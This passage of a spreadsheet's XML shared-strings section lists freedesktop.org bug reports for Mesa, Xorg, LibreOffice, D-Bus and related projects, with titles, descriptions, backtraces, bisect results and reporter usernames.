'--disable-xf86vidmode' '--disable-xf86misc' '--disable-xcsecurity'
'--disable-xevie' '--disable-lbx' '--disable-appgroup' '--disable-cup'
'--disable-evi' '--disable-dbe' '--disable-xf86bigfont' '--disable-dpms' 
'--disable-xinput' '--disable-xorg' '--disable-dmx' '--disable-xvfb'
'--disable-xnest' '--disable-xwin' '--disable-xprint' '--disable-xgl'
'--disable-xglx' '--disable-xegl' '--enable-kdrive' '--enable-xephyr'
'--disable-xorgcfg' '--disable-kdb_mode' '--prefix=/home/amd/opt'</t>
  </si>
  <si>
    <t>MESA-95138</t>
  </si>
  <si>
    <t>[deqp 32bit gen8+] deqp-gles31.functional.draw_indirect.negative</t>
  </si>
  <si>
    <t>Two dEQP tests fail for 32bit platforms only:
deqp-gles31.functional.draw_indirect.negative.command_offset_not_in_buffer_signed32_wrap 
deqp-gles31.functional.draw_indirect.negative.command_offset_not_in_buffer_unsigned32_wrap
Sample output:
/tmp/build_root/m32/opt/deqp/modules/gles31/deqp-gles31 --deqp-case=dEQP-GLES31.functional.draw_indirect.negative.command_offset_not_in_buffer_signed32_wrap --deqp-log-images=disable --deqp-gl-config-name=rgba8888d24s8 --deqp-surface-width=400 --deqp-surface-height=300 --deqp-visibility=hidden
dEQP Core git-ac9895c3cd060bb4414b0a932e2d09b0c47dbef2 (0xac9895c3) starting..
  target implementation = 'X11 GLX'
Test case 'dEQP-GLES31.functional.draw_indirect.negative.command_offset_not_in_buffer_signed32_wrap'..
Test case duration in microseconds = 10749 us
  Fail (Got unexpected error.)</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-6399</t>
  </si>
  <si>
    <t>F13F14F15 not working on an Apple Pro Keyboard</t>
  </si>
  <si>
    <t>Hi
On my Macintosh with an Apple Pro Keyboard Keys F13F14 and F15 are not
working there is no keysym's assisiated with.</t>
  </si>
  <si>
    <t>XORG-18472</t>
  </si>
  <si>
    <t>Xinerama broken with xserver 1.5</t>
  </si>
  <si>
    <t>This bug is forwarded from https://.launchpad.net/bugs/292214.
when the mga driver is configured for xinerama the server aborts with the message:
MGA(0): Unable to map BAR 0. Invalid argument (22)
This bug is confirmed in ubuntu and OpenSuse at http://www.linux-club.de/viewtopic.php?f=48&amp;t=97381.
I belive it is different to #9261 (this is no segfault).</t>
  </si>
  <si>
    <t>siretart</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-26653</t>
  </si>
  <si>
    <t>need git account for spice.</t>
  </si>
  <si>
    <t>ieidus</t>
  </si>
  <si>
    <t>XORG-1224</t>
  </si>
  <si>
    <t>Lib/Xrender</t>
  </si>
  <si>
    <t>XRender does not build with jhbuild due to error in configure.ac</t>
  </si>
  <si>
    <t>The RENDER_CFLAGS are not exported</t>
  </si>
  <si>
    <t>jaap</t>
  </si>
  <si>
    <t>LIBREOFFICE-57451</t>
  </si>
  <si>
    <t>FILEOPEN: CRASH when FILEOPEN .xlsx</t>
  </si>
  <si>
    <t>Created attachment 70471
.zip containing both the original .ODS and .XLSX file created with Libreoffice Version 3.6.3.2 (Build ID: 58f22d5)
Problem description: .XLSX file created by Libreoffice from .ods won't load and then soft 'quit unexpectedly'
Steps to reproduce:
1. Open .ods file
2. Save as in .xlsx format
3. Close the new .xlsx file
4. Reopen it then crash
Current behavior: file begins to load and then soft quit in the middle of loading
Expected behavior: file should load... (because i need to know how it is in excel format)
Platform (if different from the browser): 
Browser: Mozilla/5.0 (Macintosh Intel Mac OS X 10.6 rv:17.0) Gecko/17.0 Firefox/17.0</t>
  </si>
  <si>
    <t>pixx</t>
  </si>
  <si>
    <t>XORG-23034</t>
  </si>
  <si>
    <t>FixesHideCursor is broken in X server git</t>
  </si>
  <si>
    <t>Created attachment 28183
GTK test program displaying an animated cursor.
Three broken cases identified possibly linked to the same cause. Test
programs are attached. Busycursor is a gtk program that displays an animated
cursor (in the default Fedora GNOME theme anyway) hidecursor just calls
XFixesHideCursor/XFixesShowCursor until cancelled.
Test case 1:
1. run busycursor click button leave cursor in busycursor window
2. open terminal run hidecursor while cursor is still in busycursor
3. ctrl+c hidecursor until exit
4. ctrl+c busycursor
Server crashes but it seems to happen in different cases. Looks like some
cursor reference is still around after the cursor got freed.
Test case 2:
1. repeat steps 1 - 3 from above
The cursor is now animated everywhere not just in the window.
Test case 3:
1. run busycursor click button move cursor outside of busycursor window
2. run hidecursor ctrl+c hidecursor
Moving the cursor back into the busycursor window won't display a cursor at
all.</t>
  </si>
  <si>
    <t>XCB-10877</t>
  </si>
  <si>
    <t>xcb-atom gperf m4 madness is buggy</t>
  </si>
  <si>
    <t>When the keyword list is emitted COUNT isn't re-initialized to zero which causes wrong values to be written to the hash table.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-104706</t>
  </si>
  <si>
    <t>Add mime-type for Ringtone / M4R</t>
  </si>
  <si>
    <t>SYSTEMD-89230</t>
  </si>
  <si>
    <t>Created attachment 113666
po: update Polish translation
Attached patch updates the Polish translation for new strings.</t>
  </si>
  <si>
    <t>DRI-71596</t>
  </si>
  <si>
    <t>[Acer Aspire V5-573G] Black screen on boot due to low brightness setting</t>
  </si>
  <si>
    <t>Created attachment 89178
Hardware information
In the last three weeks I've narrowed down the bug described in the
subject through Ubuntu launchpad. My new Laptop (Acer Aspire V5-573G)
with new Haswell CPU shows a black screen on reboot because the
brightness is on zero level. I verified this behaviour with the latest
mainline kernel from
http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.12-trusty/
I have done the bisect process and tracked the bug down to the following commit.
For explanation:
good commit means: The laptop starts with display brightness on full
power but low(er) resolution and the Fn+ keys are not working
bad commit means: The laptop starts with black display (0 brightness)
Fn+ keys are working and you can level up the brightness trough the
Fn+ keys. The resolution is the native LCD hardware display resolution
Bisect output:
70b12bb415463c1bd146b67c5fbf6784fd046ad9 is the first bad commit
commit 70b12bb415463c1bd146b67c5fbf6784fd046ad9
Author: Paulo Zanoni 
Date: Tue Nov 20 13:32:30 2012 -0200
    drm/i915: promote Haswell to full support
    Since it should be working a little bit better now.
    Signed-off-by: Paulo Zanoni 
    Signed-off-by: Daniel Vetter 
:040000 040000 f93a7761de2157a8be61f20ca9a5499264bb5c55
1fed098470278830f06b0bca1706f61ba231d38d M drivers
For the full bug report and the additional hardware information please
see https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1239183
I've also searched the LKML and maybe this bug could be in conjunction
with http://marc.info/?t=137837786100005&amp;r=1&amp;w=2</t>
  </si>
  <si>
    <t>mario.kleinsasser</t>
  </si>
  <si>
    <t>PACKAGEKIT-53532</t>
  </si>
  <si>
    <t>packagekitd crashes when installing EULA packages</t>
  </si>
  <si>
    <t>Created attachment 65591
packagekitd backtrace
==From the downstream bugzilla==
https://bugzilla.novell.com/show_bug.cgi?id=775651#c1
The SIGTRAP was from pk-transaction.c:pk_transaction_run() and the function didn't handle PK_ROLE_ENUM_ACCEPT_EULA which is supposed to be run by pk_transaction_accept_eula().
It could be a race condition that pk_transaction_list_run_idle_cb() was called right after pk_transaction_accept_eula().</t>
  </si>
  <si>
    <t>glin</t>
  </si>
  <si>
    <t>XORG-691</t>
  </si>
  <si>
    <t>Manual page X(7) does not reference Xprt(1x) xplsprinters(1x) etc.</t>
  </si>
  <si>
    <t>Manual page X(7) does not reference Xprt(1x) xplsprinters(1x) etc.
So far the following tools should be listed there:
Xprt(1x)
xplsprinters(1x)
Xprint(7)
... assigning bug to someone who knows how to edit these pages without
converting them to docbook first... :)</t>
  </si>
  <si>
    <t>MESA-72659</t>
  </si>
  <si>
    <t>[llvmpipe] piglit getteximage-formats init-by-rendering regression</t>
  </si>
  <si>
    <t>mesa: e84a1ab3c400f819408a7ebe01c2325cd59d94d3 (master)
$ ./bin/getteximage-formats init-by-rendering -auto
Using test set: Core formats
The textures will be initialized by rendering to them using glDrawPixels.
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Illegal surface creation without bind flag
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.stmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.stmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.ldmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.ldmxcsr
Broken module found verification continues.
155139059ba588da1161eaa692515cacdead9f4e is the first bad commit
commit 155139059ba588da1161eaa692515cacdead9f4e
Author: Zack Rusin 
Date:   Fri Dec 6 01:28:25 2013 -0500
    llvmpipe: fix blending with half-float formats
    The fact that we flush denorms to zero breaks our half-float
    conversion and blending. This patches enables denorms for
    blending. It's a little tricky due to the llvm bug that makes
    it incorrectly reorder the mxcsr intrinsics:
    http://llvm.org/bugs/show_bug.cgi?id=6393
    Signed-off-by: Zack Rusin 
    Reviewed-by: JosÃ© Fonseca 
    Reviewed-by: Roland Scheidegger 
    Signed-off-by: Zack Rusin 
:040000 040000 5564b14ae9b7870ae8f4845f2069878c0752d5bc 84eb2a43a71956a57817e373117c2e2952a058d2 M	src
bisect run success</t>
  </si>
  <si>
    <t>MESA-97291</t>
  </si>
  <si>
    <t>Incorrect packing of struct</t>
  </si>
  <si>
    <t>Created attachment 125694
Shaders with faulty and non faulty versions
I'm the main developer of Ogre 2.1
Our shaders produce incorrect results on Mesa. (we always use std140)
I believe the problem is caused by incorrect packing of structs. It's 05:30 am now so I couldn't double check yet.
I am attaching the Vertex shader and Pixel shader. The main and only difference between the two is that one does shadow mapping the other one doesn't.
The one doing shadow mapping just glitches. By glitches I mean colours are washed out (as if lighting was really wrong) or just black.
This happens with all of our samples where shadow mapping is done.
I believe this is caused by our unusual struct definition:
struct ShadowReceiverData
{
	mat4 texViewProj
	vec2 shadowDepthRange
	vec4 invShadowMapSize
}
struct Light
{
	vec3 position
	vec3 diffuse
	vec3 specular
	vec3 attenuation
	vec3 spotDirection
	vec3 spotParams
}
layout(binding = 0) uniform PassBuffer
{
	//Vertex shader (common to both receiver and casters)
	mat4 viewProj
	//Vertex shader
	mat4 view
	ShadowReceiverData shadowRcv[3] //This is not in the good shader
	//Pixel shader
	mat3 invViewMatCubemap
	float pssmSplitPoints0 //Not present in the good shader
	float pssmSplitPoints1 //Not present in the good shader
	float pssmSplitPoints2 //Not present in the good shader
	Light lights[1]
} pass
glxinfo | grep 'version'
server glx version string: 1.4
client glx version string: 1.4
GLX version: 1.4
    Max core profile version: 4.1
    Max compat profile version: 3.0
    Max GLES1 profile version: 1.1
    Max GLES[23] profile version: 3.0
OpenGL core profile version string: 4.1 (Core Profile) Mesa 11.2.0
OpenGL core profile shading language version string: 4.10
OpenGL version string: 3.0 Mesa 11.2.0
OpenGL shading language version string: 1.30
OpenGL ES profile version string: OpenGL ES 3.0 Mesa 11.2.0
OpenGL ES profile shading language version string: OpenGL ES GLSL ES 3.00
OpenGL renderer string: Gallium 0.4 on AMD CAPE VERDE (DRM 2.43.0 LLVM 3.8.0)
I own a Radeon HD 7770 1GB.
May worth noting this bug also happens on SW rasterizer because the exact same output can be seen on a virtual machine.
I'm attached the shaders both under Good and Bad folder.
I'm guessing you're gonna need more information from me so let me know what I'm missing. Ideally I would have time to track this down to the exact variable in the wrong offset but I don't have the time (and it's 05:48am already!).
You probably should add our samples to your testing suite. A lot of them don't work with Mesa and would help improve Mesa greatly.
Our code can be found at:
https://bitbucket.org/sinbad/ogre/src/dc52e186d53611b20d4f99d30266c56c29099ef7/?at=v2-1-pso
I can provide assistance compiling our samples. (or binary blobs if it's too much hassle)
Just as an example this is how our PbsSample is supposed to look: http://imgur.com/7lCnZ6h
This is how Mesa renders it (incorrectly): http://imgur.com/SfOsBgY
This is how Mesa (correctly!) renders it when shadows are disabled (Note: In the pbs sample there are 3 lights but when shadows are disabled Ogre will only use 1 light): http://imgur.com/mS1i74Y
In other samples activating shadow mapping just results in zero. My best guess is bad offset calculation.
Have fun!</t>
  </si>
  <si>
    <t>UIM-8964</t>
  </si>
  <si>
    <t>uim 1.3.0 is not released yet</t>
  </si>
  <si>
    <t>The TODO list for uim 1.2.0.</t>
  </si>
  <si>
    <t>PM-UTILS-24269</t>
  </si>
  <si>
    <t>Resuming from pm-hibernate hangs at chvt in sleep.d/99video</t>
  </si>
  <si>
    <t>I have pm-utils-1.2.5 running on a gentoo desktop with a nvidia geforce 6200. The kernel I use is 2.6.30-r6 patched with tuxonice.
Hibernating and resuming from x-server works just fine except for one thing: When resuming the hibernation file gets read which is shown by fbsplash. As soon as it is fully read the screen switches to black with only a white cursor blinking in the top left edge and stays there (obviously vt 63). Switching manually to x by alt-f7 works just fine.
After debugging this problem I found out that pm-utils hangs at the hook 99video precisely at the call 'chvt $(restorestate console)' in maybe_deallocvt(). pm-suspend.log shows that it is called correctly by 'chvt 7' but this is the last entry in the log during the hang. Only alt-f7 makes it resume.
I found out that inserting 'sleep 3' in 99video just in front of the maybe_deallocvt call helps to avoid the problem. But thats just half a solution since it delays the resume and (worse) gets overwritten by every update of pm-utils. Some idea what is happening here?
Jan Krieg
gentoo-desktop eruvaer-ohta # emerge --info
Portage 2.1.6.13 (default/linux/x86/2008.0/desktop gcc-4.3.2 glibc-2.9_p20081201-r2 2.6.30-gentoo-r6 i686)
=================================================================
System uname: Linux-2.6.30-gentoo-r6-i686-Intel-R-_Pentium-R-_4_CPU_2.60GHz-with-gentoo-1.12.11.1
Timestamp of tree: Sat 26 Sep 2009 16:15:02 +0000
distcc 3.1 i686-pc-linux-gnu [disabled]
ccache version 2.4 [enabled]
app-shells/bash:     4.0_p28
dev-java/java-config: 2.1.8-r1
dev-lang/python:     2.6.2-r1
dev-util/ccache:     2.4-r7
dev-util/cmake:      2.6.4
sys-apps/baselayout: 1.12.11.1
sys-apps/sandbox:    1.6-r2
sys-devel/autoconf:  2.13 2.63-r1
sys-devel/automake:  1.7.9-r1 1.8.5-r3 1.9.6-r2 1.10.2
sys-devel/binutils:  2.18-r3
sys-devel/gcc-config: 1.4.1
sys-devel/libtool:   2.2.6a
virtual/os-headers:  2.6.27-r2
ACCEPT_KEYWORDS=x86
CBUILD=i686-pc-linux-gnu
CFLAGS=-O2 -march=pentium4 -pipe -fomit-frame-pointer
CHOST=i686-pc-linux-gnu
CONFIG_PROTECT=/etc /usr/kde/3.5/env /usr/kde/3.5/share/config /usr/kde/3.5/shutdown /usr/share/config
CONFIG_PROTECT_MASK=/etc/ca-certificates.conf /etc/env.d /etc/env.d/java/ /etc/fonts/fonts.conf /etc/gconf /etc/revdep-rebuild /etc/sandbox.d /etc/splash /etc/terminfo /etc/texmf/language.dat.d /etc/texmf/language.def.d /etc/texmf/updmap.d /etc/texmf/web2c /etc/udev/rules.d
CXXFLAGS=-O2 -march=pentium4 -pipe -fomit-frame-pointer
DISTDIR=/distfiles/
FEATURES=ccache distlocks fixpackages parallel-fetch protect-owned sandbox sfperms strict unmerge-orphans userfetch
GENTOO_MIRRORS=ftp://ftp-stud.fht-esslingen.de/pub/Mirrors/gentoo/ ftp://ftp.wh2.tu-dresden.de/pub/mirrors/gentoo
LANG=de_DE.utf8
LC_ALL=de_DE.utf8
LDFLAGS=-Wl-O1
LINGUAS=de
MAKEOPTS=-j2
PKGDIR=/usr/portage/packages
PORTAGE_CONFIGROOT=/
PORTAGE_RSYNC_OPTS=--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages
PORTAGE_TMPDIR=/var/tmp
PORTDIR=/usr/portage
PORTDIR_OVERLAY=/usr/portage/local/layman/sunrise
SYNC=rsync://rsync.europe.gentoo.org/gentoo-portage
USE=X a52 aac acl acpi alsa avahi bash-completion berkdb bluetooth branding bzip2 cairo cdr cli cracklib crypt cups dbus dri dts dvd dvdr eds emboss encode evo fam firefox flac fortran gdbm gif gnome gpm gstreamer gtk hal iconv ipv6 isdnlog jpeg ldap libnotify mad mikmod mmx modules mp3 mp4 mpeg mudflap ncurses nls nptl nptlonly nvidia ogg opengl openmp pam pcre pdf perl png ppds pppd python qt3support quicktime readline reflection sdl session snmp spell spl ssl startup-notification svg sysfs tcpd thunar tiff truetype unicode usb vorbis win32codecs x264 x86 xml xorg xulrunner xv xvid zlib ALSA_CARDS=ali5451 als4000 atiixp atiixp-modem bt87x ca0106 cmipci emu10k1 emu10k1x ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 intel8x0m maestro3 trident usb-audio via82xx via82xx-modem ymfpci ALSA_PCM_PLUGINS=adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mmap_emul mulaw multi null plug rate route share shm softvol APACHE2_MODULES=actions alias auth_basic authn_alias authn_anon authn_dbm authn_default authn_file authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache dav dav_fs dav_lock deflate dir disk_cache env expires ext_filter file_cache filter headers include info log_config logio mem_cache mime mime_magic negotiation rewrite setenvif speling status unique_id userdir usertrack vhost_alias ELIBC=glibc INPUT_DEVICES=evdev KERNEL=linux LCD_DEVICES=bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text LINGUAS=de USERLAND=GNU VIDEO_CARDS=nvidia vesa
Unset:  CPPFLAGS CTARGET EMERGE_DEFAULT_OPTS FFLAGS INSTALL_MASK PORTAGE_COMPRESS PORTAGE_COMPRESS_FLAGS PORTAGE_RSYNC_EXTRA_OPTS</t>
  </si>
  <si>
    <t>jan.krieg</t>
  </si>
  <si>
    <t>TELEPATHY-69425</t>
  </si>
  <si>
    <t>[1.0] expunge mentions of ContactList channels</t>
  </si>
  <si>
    <t>+        local or remote pending member) or 0 if the user is not a
+        member at all (which is likely to be the case for instance
+        on the old ContactList channels). Note that this is different
There is no such thing as a ContactList channel. We have always been at war with Eurasia.</t>
  </si>
  <si>
    <t>DRI-85582</t>
  </si>
  <si>
    <t>[All Bisected]igt/testdisplay causes testdisplay.c:789: Failed assertion: ret</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: Yes.
It's a igt regression issue.
Good commit on igt: a124b1a430bf47f31fcff0614dbc00dbe2794dcf
Bad commit on igt: 15972aa8666781ad557f17ed4b5d689cdb657d78
Non-working platforms: All
==kernel==
--------------------------
origin/drm-intel-nightly: 32cefad9992e67b4ee7487adf465bd7e189c9c1c(fails)
    drm-intel-nightly: 2014y-10m-27d-11h-39m-04s UTC integration manifest
origin/drm-intel-next-queued: 9d34570b5dae6c0c389d6a99dbc52b62beef25b2(fails)
    drm/i915: Remove unnecessary test on the gen in intel_do_mmio_flip()
origin/drm-intel-fixes: 6be1e3d3ea29354d7c834a3936e796e185d5c73b(fails)
    drm/i915: Fix GMBUSFREQ on vlv/chv
==Bug detailed description==
igt/testdisplay causes testdisplay.c:789: Failed assertion: ret
Output:
[root@x-hsw27 intel-gpu-tools]# ./testdisplay -i
Connectors:
id      encoder status          type    size (mm)       modes
18      19      connected       VGA     470x300         11
  modes:
  name refresh (Hz) hdisp hss hse htot vdisp vss vse vtot flags type clock
[0]  1680x1050 60 1680 1784 1960 2240 1050 1053 1059 1089 0x6 0x48 146250
[1]  1280x1024 75 1280 1296 1440 1688 1024 1025 1028 1066 0x5 0x40 135000
[2]  1280x1024 60 1280 1328 1440 1688 1024 1025 1028 1066 0x5 0x40 108000
[3]  1152x864 75 1152 1216 1344 1600 864 865 868 900 0x5 0x40 108000
[4]  1024x768 75 1024 1040 1136 1312 768 769 772 800 0x5 0x40 78800
[5]  1024x768 60 1024 1048 1184 1344 768 771 777 806 0xa 0x40 65000
[6]  800x600 75 800 816 896 1056 600 601 604 625 0x5 0x40 49500
[7]  800x600 60 800 840 968 1056 600 601 605 628 0x5 0x40 40000
[8]  640x480 75 640 656 720 840 480 481 484 500 0xa 0x40 31500
[9]  640x480 60 640 656 752 800 480 490 492 525 0xa 0x40 25200
[10]  720x400 70 720 738 846 900 400 412 414 449 0x6 0x40 28320
21      0       disconnected    HDMI-A  0x0             0
26      0       disconnected    HDMI-A  0x0             0
28      0       disconnected    DP      0x0             0
32      0       disconnected    HDMI-A  0x0             0
CRTCs:
id      fb      pos     size
8       47      (00)   (1680x1050)
  1680x1050 60 1680 1784 1960 2240 1050 1053 1059 1089 0x6 0x48 146250
12      0       (00)   (0x0)
   0 0 0 0 0 0 0 0 0 0x0 0x0 0
16      0       (00)   (0x0)
   0 0 0 0 0 0 0 0 0 0x0 0x0 0
Test assertion failure function main file testdisplay.c:789:
Failed assertion: ret
==Reproduce steps==
---------------------------- 
1. ./testdisplay -i
==Bisect results==
----------------------------
4306538d1d3f60877866c39c9ca953cc5e541dae is the first bad commit
commit 4306538d1d3f60877866c39c9ca953cc5e541dae
Author:     Daniel Vetter 
AuthorDate: Thu Oct 2 11:18:20 2014 +0200
Commit:     Daniel Vetter 
CommitDate: Thu Oct 2 11:34:55 2014 +0200
    tests: Sprinkle missing igt_exit() where needed.
    Yay for breaking piles of tests.
    This regression has been introduced with
    commit 5782eca1e19e85a04ad402fa4094aa1b5f9c53ce
    Author: Tim Gore 
    Date:   Wed Oct 1 13:25:20 2014 +0100
        lib/igt_core.c: disable lowmemorykiller during tests
    Cc: Tim Gore 
    Signed-off-by: Daniel Vetter 
:040000 040000 f4553fcabc3e4bdd1f81543b0eba3e627dabd556 90119303d04767b2a4c9b10b8c0348df27e0c02d M      tests</t>
  </si>
  <si>
    <t>XORG-55980</t>
  </si>
  <si>
    <t>X Segfault on second screen resize</t>
  </si>
  <si>
    <t>Hi 
with last kernel 3.x I have a segfault of X server (v. 1.13.0).
When i start X (on kde4 or gnome3 environment) all start correctly. I have a CRT monitor that support 1600x1200 resolution. Through these steps i have always segfault:
1. X started with a resolution of 1600x1200
2. Change resolution to 1280x1024 (here resolution change correctly)
3. Change resolution to 1600x1200 (here Segfault)
resize called 1600 1200
resize called 1280 1024
resize called 1600 1200
(EE) 
(EE) Backtrace:
(EE) 0: /usr/bin/X (xorg_backtrace+0x36) [0x577a6e]
(EE) 1: /usr/bin/X (0x400000+0x17b429) [0x57b429]
(EE) 2: /lib64/libpthread.so.0 (0x7fb3af392000+0xef30) [0x7fb3af3a0f30]
(EE) 3: /lib64/libc.so.6 (0x7fb3ae01a000+0x1230f0) [0x7fb3ae13d0f0]
(EE) 4: /usr/lib64/xorg/modules/libexa.so (0x7fb3ac3f5000+0x5b75) [0x7fb3ac3fab75]
(EE) 5: /usr/lib64/xorg/modules/libexa.so (0x7fb3ac3f5000+0x5eb4) [0x7fb3ac3faeb4]
(EE) 6: /usr/lib64/xorg/modules/libexa.so (0x7fb3ac3f5000+0x87f0) [0x7fb3ac3fd7f0]
(EE) 7: /usr/lib64/xorg/modules/libexa.so (0x7fb3ac3f5000+0x10c3e) [0x7fb3ac405c3e]
(EE) 8: /usr/lib64/xorg/modules/libexa.so (0x7fb3ac3f5000+0x12692) [0x7fb3ac407692]
(EE) 9: /usr/lib64/xorg/modules/libexa.so (0x7fb3ac3f5000+0xb803) [0x7fb3ac400803]
(EE) 10: /usr/bin/X (0x400000+0x168a80) [0x568a80]
(EE) 11: /usr/bin/X (0x400000+0xb8fff) [0x4b8fff]
(EE) 12: /usr/bin/X (0x400000+0x31c5e) [0x431c5e]
(EE) 13: /usr/bin/X (0x400000+0x345eb) [0x4345eb]
(EE) 14: /usr/bin/X (0x400000+0x248fa) [0x4248fa]
(EE) 15: /lib64/libc.so.6 (__libc_start_main+0xec) [0x7fb3ae038ae8]
(EE) 16: /usr/bin/X (0x400000+0x24489) [0x424489]
(EE) 
(EE) Segmentation fault at address 0x8
Fatal server error:
Caught signal 11 (Segmentation fault). Server aborting
Same segfault happens if I leave my computer on poweron but with monitor on poweroff. When i poweron monitor screen resolution automatically go to 1024x768 and then when i try to restore 1600x1200 resolution I have same segfault.
Hereinafter same informations about my env:
# uname -a
Linux golia2 3.6.0-rc6+ #1 SMP PREEMPT Sat Sep 29 11:29:58 CEST 2012 x86_64 Pentium(R) Dual-Core CPU E5200 @ 2.50GHz GenuineIntel GNU/Linux
# lspci | grep VGA  
01:00.0 VGA compatible controller: NVIDIA Corporation G92 [GeForce GTS 250] (rev a2)
Mesa-9.0 and libdrm 2.4.39.
This error happens with both vanilla kernel or nouveau-kernel from git.
How can i help you to fix this bug ?</t>
  </si>
  <si>
    <t>geaaru</t>
  </si>
  <si>
    <t>LIBREOFFICE-81357</t>
  </si>
  <si>
    <t>Setting Default Western Language to None doesn't stick</t>
  </si>
  <si>
    <t>If I change my options so that Default language for Western documents is set  to [None] that setting reverts to English (USA) after restarting LibreOffice.  This bug started in version 4.2 and also exists in 4.3 (tested Linux and Windows).  
Although the DefaultLocale setting in the XML config file is properly changed to zxx new documents aren't set with None as their language.  
To reproduce this problem
1.)  change Tools -&gt; Options -&gt; Language Settings -&gt; Language -&gt; Default languages for Document -&gt; Western  to  [None].
2.)  close LibreOffice completely
3.)  restart LibreOffice and check the setting.  It will not be None - probably English (USA).
4.)  create a new Writer document.  The default language will not be none.</t>
  </si>
  <si>
    <t>XORG-89749</t>
  </si>
  <si>
    <t>Xserver fails to load while booting a ubuntu 15.04 32bit ISO image</t>
  </si>
  <si>
    <t>Tested a Lubuntu 15.05 32bit image in development and noticed my monitor would go blank during the display of the Lubuntu splash image. Rebooted the image and just as the splash screen appeared pressed ctrl+esc which makes Lubuntu output the boot activities. As it when down the list of services it was activating all the text on the screen started disappearing and reappearing.  Pressed ctrl+alt+f4 was brought to a tty terminal. Logged in and typed startx. The Xserver started yet all that appeared was an error message window and a notification. The rest of the screen was black. 
Here is the URL to the bug.
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1432843</t>
  </si>
  <si>
    <t>saqman2060</t>
  </si>
  <si>
    <t>DESKTOP-FILE-UTILS-35844</t>
  </si>
  <si>
    <t>[PATCH] validate.c: require all possible main categories to be present at once</t>
  </si>
  <si>
    <t>Created attachment 45098
validate.c: do not require all possible main categories to be present
According to standard The Related Categories column
lists one or more categories that are suggested to be used in conjunction
with the Additional Category. Note that at least one Main Category must
be included .... But there are many categories where desktop-file-validate requires all possible Main Categories to be present.
(see attached patch or git commit (link below) for the list of affected categories.
The standart allows multiple Main Categories but clearly specifies that
it is optional: __If__ multiple Main Categories are included ...
like EducationMusic is clearly different from AudioVideoMusic
and both forms should be allowed because they go to the different menus.
Example:
warn    sylpheed-3.1.0-alt1.x86_64      desktop-file-validate utility exited abnormally with the following message(s): /usr/share/applications/sylpheed.desktop: error: (will be fatal in the future): value Email in key Categories in group Desktop Entry requires another category to be present among the following categories: OfficeNetwork
whereas sylpheed's Categories=GTKNetworkEmailNews
and many more.
proposed patch is attached and also can be merged from
http://git.altlinux.org/people/viy/packages/?p=desktop-file-utils-xdg.gita=commith=9e35a53b52aeba3e709fec16cfc3a52eb5f2bce7</t>
  </si>
  <si>
    <t>viy</t>
  </si>
  <si>
    <t>LIBREOFFICE-32797</t>
  </si>
  <si>
    <t>LibreOffice Writer freezing while saving a file or export as pdf</t>
  </si>
  <si>
    <t>Created attachment 41586
SaveAs-Problem Backtrace
Operating System:
Debian 4.1.2-25 lenny2
Kernel-Version:
Linux 2.6.26-1-686
KDE-Version:
3.5.10
LibreOffice-Version:
LibreOffice 3.3.0 
OOO330m18 (Build:4)
Summary:
LibreOffice freezes when I want to save a document about the save as...-dialog.
Also LibreOffice freezes when I want to export a document about the Export directly as PDF-dialog.
This actions result in a permanent LibreOffice freeze. I can only quit LibreOffice by killing the process in the console. 
I have added two backtraces. Once for the problem with the save as..-dialog and the other backtrace is about the Export directly as PDF problem.</t>
  </si>
  <si>
    <t>reportingbugs</t>
  </si>
  <si>
    <t>DBUS-89444</t>
  </si>
  <si>
    <t>should not assume that sockets are of type int</t>
  </si>
  <si>
    <t>On Unix sockets are just file descriptors which are of type int. -1 is the invalid non-socket value used to represent errors.
On Windows sockets are correctly of type SOCKET which is a UINT_PTR (an unsigned type of size equal to pointer like ISO C uintptr_t) and INVALID_SOCKET is the invalid non-socket value used to represent errors.
At the moment libdbus sysdeps methods that take a socket fd take an int. This is clearly wrong and leads to warnings like this:
/home/ralf.habacker/src/dbus-master/dbus/dbus-sysdeps-win.c: In function '_dbus_socket_is_invalid':
/home/ralf.habacker/src/dbus-master/dbus/dbus-sysdeps-win.c:649:15: warning: comparison between signed and unsigned integer expressions [-Wsign-compare]
     return fd == INVALID_SOCKET ? TRUE : FALSE
We should either do this in dbus-sysdeps.h instead:
#ifdef DBUS_WIN
typedef int DBusSocket
#else
typedef SOCKET DBusSocket
#endif
and make _dbus_close_socket() and similar functions take a DBusSocket instead of an int either that or use a type-safe struct
typedef struct {
#ifdef DBUS_WIN
  SOCKET windows_socket
#else
  int unix_fd
#endif
} DBusSocket
and pass/return it by value if that's something we can do portably.
We cannot do this for public APIs like dbus_connection_get_socket() which must continue to have their current types (with a cast from the internal representation if necessary).
Unix-specific functions can continue to take and return int: the fact that fds are ints and the fact that sockets are just fds is quite a fundamental Unix ABI thing. Similarly Windows-specific functions can use SOCKET or HANDLE directly if desired.</t>
  </si>
  <si>
    <t>LIBREOFFICE-59056</t>
  </si>
  <si>
    <t>Charts are moved between sheets when saving a spreadsheet created with 3.6</t>
  </si>
  <si>
    <t>hacker</t>
  </si>
  <si>
    <t>MESA-24185</t>
  </si>
  <si>
    <t>[G45] Blender: crash in brw_prepare_vertices after Render this window</t>
  </si>
  <si>
    <t>Created attachment 29908
blender backtrace
Blender will crash after the Render this window button is pressed. See attached screenshot to find the button.
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
